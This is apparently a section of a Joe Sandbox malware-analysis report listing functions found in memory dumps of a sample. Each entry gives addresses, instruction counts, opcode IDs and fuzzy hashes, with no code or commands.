                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q
                                                                                                              • API String ID: 0-1807707664
                                                                                                              • Opcode ID: 338346b3c6cdab487773bc7d439b5c31fcb6ab38a9326b821886fca0de58ca03
                                                                                                              • Instruction ID: 96723f7b83fe7574b8e42fedd2e5b6444e0d780d06cabcc38060f575b72cebec
                                                                                                              • Opcode Fuzzy Hash: 338346b3c6cdab487773bc7d439b5c31fcb6ab38a9326b821886fca0de58ca03
                                                                                                              • Instruction Fuzzy Hash: 1C112330F052408BEB497BBAA4642BD76E7FBC5256B14886ED01BDB382CD38CD024793
                                                                                                              Function 010B4E50 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q
                                                                                                              • API String ID: 0-1807707664
                                                                                                              • Opcode ID: aa8e82617a0f4e64f25c8d02ecf8ae1d4892cc1f11f0273dff0938eda36fec1c
                                                                                                              • Instruction ID: 09eba1035bbc171977e261296478a52988261e647c315dde88d188c0e776664e
                                                                                                              • Opcode Fuzzy Hash: aa8e82617a0f4e64f25c8d02ecf8ae1d4892cc1f11f0273dff0938eda36fec1c
                                                                                                              • Instruction Fuzzy Hash: 3901B530B002044BEB547B7AA4586BE72EBFBC5265B14882DE01BD7381DE35DD024793
                                                                                                              Function 02B21602 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNELBASE(?), ref: 02B21660
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797865239.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_2b20000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2962429428-0
                                                                                                              • Opcode ID: 8fc0e55fc42170006934ec4fba1d18bb1b449e288123ab34237a81788e239801
                                                                                                              • Instruction ID: 09fc509a5df93b5af0bc63b876a076caf5a19ed0fa579b2d5f772bb730bfbb16
                                                                                                              • Opcode Fuzzy Hash: 8fc0e55fc42170006934ec4fba1d18bb1b449e288123ab34237a81788e239801
                                                                                                              • Instruction Fuzzy Hash: 911113B6C003598FDB20CF9AC484BDEBBF4EB48320F24845AD558A7640D778A544CFA5
                                                                                                              Function 02B21608 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNELBASE(?), ref: 02B21660
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797865239.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_2b20000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2962429428-0
                                                                                                              • Opcode ID: 557d2fb5f39f482a15983e061bc9a030ea5318fa724edb0f5faddfcf0ba256e7
                                                                                                              • Instruction ID: 8055110c7be524480cadfb24fc2fb20cdf0c4139127d64099b381f02f03046cb
                                                                                                              • Opcode Fuzzy Hash: 557d2fb5f39f482a15983e061bc9a030ea5318fa724edb0f5faddfcf0ba256e7
                                                                                                              • Instruction Fuzzy Hash: 6A1122B6C003598FDB20CF9AC444BDEBBF4EB48320F14845AD958A7240D778A544CFA9
                                                                                                              Function 078B1808 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q
                                                                                                              • API String ID: 0-2414175341
                                                                                                              • Opcode ID: 4e2865b1dd825874ce7857d8ed730eb847e9d090f9f6f47004275ca4bc1b1925
                                                                                                              • Instruction ID: 4853f60256db836fa6fe1a3dbb7e5b6869a0914528b9e8b2b03cacf26d33d610
                                                                                                              • Opcode Fuzzy Hash: 4e2865b1dd825874ce7857d8ed730eb847e9d090f9f6f47004275ca4bc1b1925
                                                                                                              • Instruction Fuzzy Hash: 0DF046227093540FD7161AB974286BE3FA9AFC6250728406FD406CB392C9648D45C3E3
                                                                                                              Function 078BD35C Relevance: .6, Instructions: 585COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6b994aee6b53e004a5ebefc415fc8bee167e5465fe3776e255acca5efe361bd6
                                                                                                              • Instruction ID: f01035bd480f532f76427526114c05cde9dbb603dff8d81b348773339e3c818b
                                                                                                              • Opcode Fuzzy Hash: 6b994aee6b53e004a5ebefc415fc8bee167e5465fe3776e255acca5efe361bd6
                                                                                                              • Instruction Fuzzy Hash: 60D19D71B142148FC704BBB9E489A6DBBF2FF88300F444569E446E77A8DA38E854C761
                                                                                                              Function 078BD508 Relevance: .5, Instructions: 536COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d600325576a9cb211a5ba9f6ac4be5d3fc4472c7f2c4c7f7dc055f1ef947d20a
                                                                                                              • Instruction ID: 485aa83d636f3cb80e5d6415d524fe565fda6486fb7aa0b7c090a87d20130489
                                                                                                              • Opcode Fuzzy Hash: d600325576a9cb211a5ba9f6ac4be5d3fc4472c7f2c4c7f7dc055f1ef947d20a
                                                                                                              • Instruction Fuzzy Hash: 4AF1E171B183108FC705BBB9E89866D7FB1AF4A300F0505AAE446D77A6CA38EC09C761
                                                                                                              Function 078BC9CC Relevance: .5, Instructions: 473COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8fd5e9ca2188bede0e2cb354ea739950a181367de5e50f41db77a0e9b34eeced
                                                                                                              • Instruction ID: f12b5ab2e6cb9e5c0d8e1a930a3c30cf88a7b264c45288089a328ea097fb8f54
                                                                                                              • Opcode Fuzzy Hash: 8fd5e9ca2188bede0e2cb354ea739950a181367de5e50f41db77a0e9b34eeced
                                                                                                              • Instruction Fuzzy Hash: 86F1A0717093508FC305FB78D8996197FF1AF89304F4549AEE486CB3A6DA38D84AC762
                                                                                                              Function 078BDAF8 Relevance: .4, Instructions: 444COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 857fc0b0473a46c4f7ab27d60698063f93dd5db83df1f621ab5123663b73adc5
                                                                                                              • Instruction ID: fa647987b2324bfaadf55f063f3308e388c687a6fa77078bdf2a47d66f425907
                                                                                                              • Opcode Fuzzy Hash: 857fc0b0473a46c4f7ab27d60698063f93dd5db83df1f621ab5123663b73adc5
                                                                                                              • Instruction Fuzzy Hash: 78023971A10219CFCB14AFB9E4896ADBBB2FB8C341F404969E40AE7354DE389D85CF51
                                                                                                              Function 078BBD60 Relevance: .4, Instructions: 425COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ce92024ea28c52a85d1f8a5945cf85cacf49cc621d635c97591572b184c9e966
                                                                                                              • Instruction ID: 8ccbed3140a029b37de0e042baf103222a4fa99ae406eadc47f289a96dbecc46
                                                                                                              • Opcode Fuzzy Hash: ce92024ea28c52a85d1f8a5945cf85cacf49cc621d635c97591572b184c9e966
                                                                                                              • Instruction Fuzzy Hash: 1FE17072B106148BC704FBBCE58972E7FA2AF88344F854569E446D3798DE38EC58C7A1
                                                                                                              Function 078BBD51 Relevance: .3, Instructions: 321COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fbbb63767d770bc37467c5fbce5c0da5b6fb8f950e892cd9ab2d9dfbc8f8bed7
                                                                                                              • Instruction ID: b2e32672bc8bfca82737094338e426a39a7e9df68862bc3dfb8f1e7536981eaa
                                                                                                              • Opcode Fuzzy Hash: fbbb63767d770bc37467c5fbce5c0da5b6fb8f950e892cd9ab2d9dfbc8f8bed7
                                                                                                              • Instruction Fuzzy Hash: 2CB19172B10614CBC704FBB8E58972E7FA2EF88304F894569E446D7798DA38EC45C7A1
                                                                                                              Function 010B9F58 Relevance: .3, Instructions: 316COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cac4bb76c711f990d73e37173b032bf2fa0c01c0cc3ae8be2d4c44a43aa7f095
                                                                                                              • Instruction ID: 35e803125774132f3fc1a9ce1ed1db34ae6241b9d16593046e045a07e4fade8a
                                                                                                              • Opcode Fuzzy Hash: cac4bb76c711f990d73e37173b032bf2fa0c01c0cc3ae8be2d4c44a43aa7f095
                                                                                                              • Instruction Fuzzy Hash: D1D1D875B00215CFCB55CFADE5C8A9DBBF6AF88310B1A80A9E545AB361CB35EC41CB50
                                                                                                              Function 010B9E37 Relevance: .3, Instructions: 299COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0653506405ca7787c1eec1a517b8b72286d42ea5a352c7689d12fdf51c07aff5
                                                                                                              • Instruction ID: 27da4469e447d7a6474f8227d7f197b5643dcd57564b84bba9d4be75745c4786
                                                                                                              • Opcode Fuzzy Hash: 0653506405ca7787c1eec1a517b8b72286d42ea5a352c7689d12fdf51c07aff5
                                                                                                              • Instruction Fuzzy Hash: 1FC1E371A00219CFCB05CFADD988ADDBBF6AB88314B198099E555AB361CB35EC41CB64
                                                                                                              Function 010B58D8 Relevance: .3, Instructions: 262COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7a3b58a3243026759dbf24df9447c6997ab2d302fa9a683fc6ec8d7efc481ec1
                                                                                                              • Instruction ID: 1d01ffe9a22c8ca1e727d0044297df6f5c0ac1bcdbcb7617d3a9cd9d1b861b63
                                                                                                              • Opcode Fuzzy Hash: 7a3b58a3243026759dbf24df9447c6997ab2d302fa9a683fc6ec8d7efc481ec1
                                                                                                              • Instruction Fuzzy Hash: D9B1C778600F05DFE706BB60E65BB9577A3E788718F548414EC021BFECCB356892DA29
                                                                                                              Function 010BC9C3 Relevance: .2, Instructions: 246COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 82dbf1e91eb69c8cd4bc1ae904513ff648311bf1e986d4f8d60b643460e74f16
                                                                                                              • Instruction ID: 57f1e6b5c8d56ac77611c83960a6b7084f2ab0c4faf9ed5347ffeedfacff8a47
                                                                                                              • Opcode Fuzzy Hash: 82dbf1e91eb69c8cd4bc1ae904513ff648311bf1e986d4f8d60b643460e74f16
                                                                                                              • Instruction Fuzzy Hash: C891D630F002198FEB18DB68C6D57EEBBF2ABD9610F388559D495AB391CA319C41CB91
                                                                                                              Function 010BC4CC Relevance: .2, Instructions: 240COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d2e97b0a3de81c30925499609abb123c57610e419025a1f6651b929e53bed6b
                                                                                                              • Instruction ID: 57107707a641e9d40038b54d7f9f91667dfae2fb850b9fb993ea21c6428d8375
                                                                                                              • Opcode Fuzzy Hash: 7d2e97b0a3de81c30925499609abb123c57610e419025a1f6651b929e53bed6b
                                                                                                              • Instruction Fuzzy Hash: 19A18530A10606CFCB14EF69C88499DBBF1FF89314F1186A9E545AB365EB71ED85CB80
                                                                                                              Function 010B69D0 Relevance: .2, Instructions: 203COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 815c9080c0070616737d073dc28d6027a5ae8883425fc9dab2a49853f62b349f
                                                                                                              • Instruction ID: d8df095729f30a0af6ca1e3386fa75d2fe853229f1e310eb38cbcb06a7c8e13a
                                                                                                              • Opcode Fuzzy Hash: 815c9080c0070616737d073dc28d6027a5ae8883425fc9dab2a49853f62b349f
                                                                                                              • Instruction Fuzzy Hash: 3C61E0307002048FEB159B7A9494BBE7BE2ABC9351F148469D586CB396CF76CC828790
                                                                                                              Function 010B8DB9 Relevance: .2, Instructions: 179COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8983a474a120f799b65816c10c66117748a39977bdaf96cf298c67c0597daec8
                                                                                                              • Instruction ID: eea82af99c5662b55810ecdaf4af572efd3d4c9004a543fb8840fddb9bded484
                                                                                                              • Opcode Fuzzy Hash: 8983a474a120f799b65816c10c66117748a39977bdaf96cf298c67c0597daec8
                                                                                                              • Instruction Fuzzy Hash: 48516B317141169FD754DF3EC8C4AAA7BEAFF8821170584BBE656CB271DB20EC018B50
                                                                                                              Function 078BF228 Relevance: .2, Instructions: 162COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d0d0c7ef04943daa712f478029148aaf52231089a5737eba74e39ef06d6e9a3
                                                                                                              • Instruction ID: d7c2253f6c46bf64f215cd0f48594b8e2fdc3668fe6d50752a8720c19bc7d48c
                                                                                                              • Opcode Fuzzy Hash: 5d0d0c7ef04943daa712f478029148aaf52231089a5737eba74e39ef06d6e9a3
                                                                                                              • Instruction Fuzzy Hash: D65180317142118BC704FF7DE989A2EBBE1AB88714F458A6DE485D3398DE38EC158792
                                                                                                              Function 078B1F20 Relevance: .1, Instructions: 112COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e5b49498472aae5a3f25730ca356d92241ce9b1e6ed1df713814762a4d24be62
                                                                                                              • Instruction ID: 46a98cd88eae6d84df2cd1d6ad211ea6dca01c68a6862abaa6304bf37c9570f8
                                                                                                              • Opcode Fuzzy Hash: e5b49498472aae5a3f25730ca356d92241ce9b1e6ed1df713814762a4d24be62
                                                                                                              • Instruction Fuzzy Hash: 17416CB1D007099BCB25DFA9C4546DDBBB1FF99310F14C659E809BB364EB70A981CB80
                                                                                                              Function 078B1910 Relevance: .1, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: feff4ce3fb991c7b0f121b70ba787f07dd55f1d46c60776a62d98f177b5df1c6
                                                                                                              • Instruction ID: 3428ca055aaee670a578b7e6f8470769c988e611d4e53cdfadcf7bfacb5bf4ab
                                                                                                              • Opcode Fuzzy Hash: feff4ce3fb991c7b0f121b70ba787f07dd55f1d46c60776a62d98f177b5df1c6
                                                                                                              • Instruction Fuzzy Hash: 874149B1D1035A8FDB20DFA9D8587EEBBF5BF88310F54842AD415EB350DB7899048BA1
                                                                                                              Function 010BAE10 Relevance: .1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0180a9009050b7f62429302d50998d9dcb9f655ec18ff2367b696b514bcc616e
                                                                                                              • Instruction ID: d1269632c1e35a1708308a28e6e5ebf590805cd2f6719e2de312159b0d10bc33
                                                                                                              • Opcode Fuzzy Hash: 0180a9009050b7f62429302d50998d9dcb9f655ec18ff2367b696b514bcc616e
                                                                                                              • Instruction Fuzzy Hash: 69411A70E00219DFEB15DBA9D894BEEBBF6AB88310F148465E445BB391DA309C05CBA4
                                                                                                              Function 010BFC38 Relevance: .1, Instructions: 102COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67523276a764048930cf046f6ec0bd3c4164cc52965e0c9206f0dd98c302515c
                                                                                                              • Instruction ID: 7f18cc77e2b3aa27494633bd201d6b43fe763f4da12f7d77b8881bcc1af68cf0
                                                                                                              • Opcode Fuzzy Hash: 67523276a764048930cf046f6ec0bd3c4164cc52965e0c9206f0dd98c302515c
                                                                                                              • Instruction Fuzzy Hash: CF31123970410A8FEB10AB6AD9557EE7FF5EB89308F1040A4E985DF385DA35C941C7A1
                                                                                                              Function 078BF0D5 Relevance: .1, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 172458f3a7524a8cfeea3d43044bdc171431a5872c9d3546fce362564549db67
                                                                                                              • Instruction ID: a8b2344ed61eeaab1da18689d9696337335c877ed01fdb1e11718caa4eee9ca4
                                                                                                              • Opcode Fuzzy Hash: 172458f3a7524a8cfeea3d43044bdc171431a5872c9d3546fce362564549db67
                                                                                                              • Instruction Fuzzy Hash: 3331B372B083508FC706A7BCEC986697FE6AF86250F4605AAD045D73A6DE38DC14C362
                                                                                                              Function 010B7F30 Relevance: .1, Instructions: 98COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 223d162428e79c07fef5d12cc0e2f51b673c9eb9d484582f4234d526fd9a83a7
                                                                                                              • Instruction ID: 314412d4a221898870af126fcf07e546125b641f17315c3440301b5f2ff45296
                                                                                                              • Opcode Fuzzy Hash: 223d162428e79c07fef5d12cc0e2f51b673c9eb9d484582f4234d526fd9a83a7
                                                                                                              • Instruction Fuzzy Hash: 61316B366005199FDB15CF2CD8C4B957BE4EF8A320B1546A1E968CB3E1C771EC51CBA4
                                                                                                              Function 010B57A0 Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 05b7be58edcacb35a4e5b190e96efa1922ebd8e4e0d0eb7ca4d527d03a3925d5
                                                                                                              • Instruction ID: ec55bd95ba3cc2dd90eba24ff3a0c7e9d8865e94f3997642eb84f5209159c13e
                                                                                                              • Opcode Fuzzy Hash: 05b7be58edcacb35a4e5b190e96efa1922ebd8e4e0d0eb7ca4d527d03a3925d5
                                                                                                              • Instruction Fuzzy Hash: DD31C73470020A9FDF01AF65E895AAE3BE6FB48315F048068F906AB3A1CB74DD51DB51
                                                                                                              Function 078BBBE3 Relevance: .1, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1810653137.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_78b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 90f3349af731704398d6071c539636f91e60e210e61d552b0b5c1b56a0da7921
                                                                                                              • Instruction ID: 68efae8b4c3a21d77b46c9fd8f47294c6b7553e551aecfb87ac7d47787dbed95
                                                                                                              • Opcode Fuzzy Hash: 90f3349af731704398d6071c539636f91e60e210e61d552b0b5c1b56a0da7921
                                                                                                              • Instruction Fuzzy Hash: 092105F1B143418FC725EBB8E4A4B993FA5EF55314B59019AE007CB3AACA38ED01C721
                                                                                                              Function 010B8FE7 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ca282475e41788debd20d13c3661dbf82382f3e40215b448d17a207a27bb108b
                                                                                                              • Instruction ID: 15feb6c4b975d6f29dbd4c27095200d2e0e24eb5cdc8c66ef15938560c06d290
                                                                                                              • Opcode Fuzzy Hash: ca282475e41788debd20d13c3661dbf82382f3e40215b448d17a207a27bb108b
                                                                                                              • Instruction Fuzzy Hash: 8421A1707142014FEB25572AA4D43BD66D7AFC8359F2884B9E742CB396EA2ACC819351
                                                                                                              Function 010B6C1F Relevance: .1, Instructions: 80COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.1797283892.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_10b0000_sS7Jrsk0Z7.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f149922eaa4990a1212fd380d00383a19df5728347f008b5b25a7dc30c55a6c
                                                                                                              • Instruction ID: 957d523b31bd13c36ce0812149ee81ec174492da9ac068e8a56e5d7193ba773b
                                                                                                              • Opcode Fuzzy Hash: 7f149922eaa4990a1212fd380d00383a19df5728347f008b5b25a7dc30c55a6c
                                                                                                              • Instruction Fuzzy Hash: 11213331B01A058FD3169B3AD894A7F7BE2EF8571571880A9E446CF3A5CE22DC028B90
